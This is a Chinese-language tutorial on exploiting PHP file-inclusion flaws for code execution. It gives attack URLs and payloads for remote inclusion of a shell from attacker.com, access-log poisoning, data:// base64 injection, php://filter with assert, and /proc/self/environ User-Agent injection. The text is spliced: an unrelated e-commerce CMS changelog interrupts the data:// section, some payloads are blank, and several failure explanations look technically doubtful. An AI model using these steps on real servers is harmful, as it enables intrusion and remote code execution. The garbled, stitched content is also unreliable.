文件包含漏洞可通过五种方法执行php代码:一、rfi需allow_url_include和allow_url_fopen开启;二、lfi配合日志注入需日志路径可读且被php解析;三、data://协议需base64编码且未禁用;四、php://filter需结合eval等动态执行函数;五、/proc/self/environ需cgi模式且user-agent可控。
如果您在Web应用中发现存在文件包含漏洞,攻击者可能利用该漏洞加载并执行恶意PHP代码。以下是触发PHP代码执行的多种方法:
一、利用远程文件包含(RFI)加载外部PHP脚本
当目标服务器启用了allow_url_fopen或allow_url_include配置时,可通过URL参数引入远程托管的PHP代码并执行。
1、构造包含远程PHP文件的请求,例如:http://target.com/vuln.php?page=http://attacker.com/shell.php
2、确保远程服务器返回的内容为合法PHP代码,且无HTTP头干扰(如使用text/plain响应头可能导致解析失败)
立即学习“PHP免费学习笔记(深入)”;
3、确认目标PHP配置中allow_url_include=On且allow_url_fopen=On
二、利用本地文件包含(LFI)配合日志文件注入执行PHP
当无法直接远程包含时,可将PHP代码写入服务器可访问的日志文件(如Apache access.log),再通过LFI包含该日志文件以触发执行。
1、向目标站点发送含PHP代码的恶意请求,例如:curl -v "http://target.com/?"
2、确定Web服务器日志路径(常见为/var/log/apache2/access.log或/var/log/nginx/access.log)
3、发起LFI请求包含日志文件:http://target.com/vuln.php?page=/var/log/apache2/access.log
4、确保日志内容被当作PHP代码解析,需满足log文件扩展名被PHP处理器识别(如配置了.log为PHP类型)或使用PHP封装器
三、利用PHP封装器data://协议直接注入代码
data://封装器允许在请求中内联传输数据,若目标PHP版本支持且未禁用该封装器,可绕过文件系统限制直接执行PHP代码。
SDCMS-B2C商城网站管理系统是一个以php+MySQL进行开发的B2C商城网站源码。 本次更新如下: 【新增的功能】 1、模板引擎增加包含文件父路径过滤; 2、增加模板编辑保存功能过滤; 3、增加对统计代码参数的过滤 4、新增会员价设置(每个商品可以设置不同级不同价格) 5、将微信公众号授权提示页单独存放到data/wxtemp.php中,方便修改 【优化或修改】 1、修改了check_b
1、构造base64编码的PHP代码,例如: 编码后为PD9waHAgZWNobyAndGVzdCc7ID8+Cg==
2、构造请求:http://target.com/vuln.php?page=data://text/plain;base64,PD9waHAgZWNobyAndGVzdCc7ID8+Cg==
3、若页面输出test,则说明成功;失败可能因disable_functions中禁用了base64_decode或data://被open_basedir限制
四、利用php://filter读取并解码PHP源码后触发执行
php://filter可用于在读取文件时应用过滤器,结合base64-encode可绕过简单内容检测,并在特定条件下实现代码执行(如配合eval等动态执行函数)。
1、确认目标存在可控制输入点并最终传递给eval()、assert()或create_function()等函数
2、构造payload:?input=php://filter/convert.base64-encode/resource=vuln.php
3、解码返回的base64内容,提取其中可利用的动态执行逻辑
4、构造二次请求,使解码后的PHP代码进入执行上下文,例如:assert(base64_decode("ZWNobyAnaGVsbG8nOw=="))
五、利用/proc/self/environ注入并包含环境变量
在CGI或某些FastCGI配置下,用户可控的HTTP头(如User-Agent)会被写入/proc/self/environ,该文件可被包含并执行其中的PHP代码。
1、发送带PHP代码的User-Agent头:User-Agent:
2、尝试包含环境变量文件:http://target.com/vuln.php?page=/proc/self/environ
3、观察响应是否执行了system命令;失败原因可能为/proc/sys/kernel/yama/ptrace_scope限制或Web服务器非CGI模式运行
